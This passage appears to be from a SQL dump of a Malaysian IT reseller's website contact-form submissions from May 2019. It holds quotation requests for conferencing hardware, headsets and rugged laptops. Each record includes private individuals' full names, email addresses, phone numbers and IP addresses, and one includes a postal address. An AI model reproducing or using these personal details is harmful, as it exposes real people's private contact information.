Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:68:\"I need a video conferencing solution for my office. How can you help\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"15\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-07 18:51:52','60.54.116.49','1'),(183,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"basri bin md jaffar\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"emzectenaga@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0387068855\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"emzec resources sdn bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:55:\"request for quotation. JABRA ENGAGE 75 WIRELESS HEADSET\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"64\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-08 11:41:30','124.13.8.116','1'),(184,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Ashley Mok\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"ashley.mok@machines.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123770317\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Machines Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:83:\"interested with Docusign and would like to know more about the product and the cost\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"11\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-09 09:29:06','202.190.189.160','1'),(185,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"xiao xui chow\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"xiao_xui86@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0127678585\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"wenet mys sdn bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"5, jln cermai 6,\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:49:\"Logitech MeetUp, Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:95:\"Can you provide a quotation of product model LOG-960-001101, LOG-989-000405 and LOG/939-001498.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"68\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-09 11:13:30','157.120.252.78','1'),(186,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"MUHAMMAD HAFIZ SANI\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"hafizsani.ninety@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0146997015\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"MUHASA ELECTRONICS\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"I need your seller contacts.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"99\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-09 14:38:37','60.54.19.1','1'),(187,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"AENEAS AURA\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"larsentoubromatang@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0198903940\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Larsen Toubro\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:122:\"K-1-27(H), PLOT 14, BLOCK F, LEVEL 1, AK 216 BATU KAWAH NEW TOWNSHIP , JALAN BATU KAWAH 93250 KUCHING , SARAWAK , MALAYSIA\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:359:\"Logitech Group, Logitech Rally, Logitech MeetUp, Logitech Connect, Logitech BCC950, Logitech PTZ Pro 2, SMARTDOCK, Logitech Brio, Logitech C9230e, Logitech C925e, Logitech B525, Logitech H570e Headset, SmartDock Extender Box, Screen Share, Group Expansion Mics, Logitech SmartDock Flex, Group 15m Extended Cable, Group 10m Extended Cable, MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:99:\"PLS SEND US ASAP FOR THIS QUOTATION AND WHAT MODEL THAT CAN U PROVIDE US .DO HESITATE TO CONTACT ME\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"87\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-09 14:40:36','219.94.37.82','1'),(188,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"NORHIDAYAH BINTI AB RAHMAN\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"norhidayah.rahman@utp.edu.my\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01136323799\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"UNIVERSITI TEKNOLOGI PETRONAS\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:64:\"UNIVERSITI TEKNOLOGI PETRONAS, 32610 BANDAR SERI ISKANDAR, PERAK\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:192:\"TOUGHBOOK 33, TOUGHBOOK 31, TOUGHBOOK 54, TOUGHBOOK 20, TOUGHPAD FZ-Q2, TOUGHBOOK T1, TOUGHBOOK N1, TOUGHPAD FZ-X1, TOUGHBOOK L1, TOUGHPAD FZ-M1, TOUGHPAD FZ-G1, TOUGHPAD FZ-A2, TOUGHPAD FZ-B2\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"04\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-10 10:01:05','115.164.76.134','1'),(189,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"KHOO Peng Sim (Sam)\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"khoo.pengsim@spie.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"+6016-3799229\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"SPIE Oil &amp; Gas Services\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:100:\"Request for Quotation: Logitech GROUP Video Conferencing System plus 2 units of Group Expansion Mics\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"88\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-13 18:28:09','165.225.112.131','1'),(190,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Kuang Seng\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"cdpl.it@icapital.biz\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0320702104\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Capital Dynamics Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:782:\"Hi. We are looking for video conferencing tool. Our requirement is one camera with 3 speakerphone. We found a product called Logitech Group with expansion mics. I would like to know some details about the product and service provided: 1) Do you provide the product demo? 2) If we purchase the product, can you deliver the product and help us install by this Friday? 3) Do you provide service to help us set up other devices to work with the product we purchase from you like help us to mount the projector on the ceiling? 4) If we purchase your product, do you provide the extended cable to help us set up the video conferencing tool? Lastly, please send us the quatation including the products I mentioned and installation services. Thanks. I look forward to hearing from you 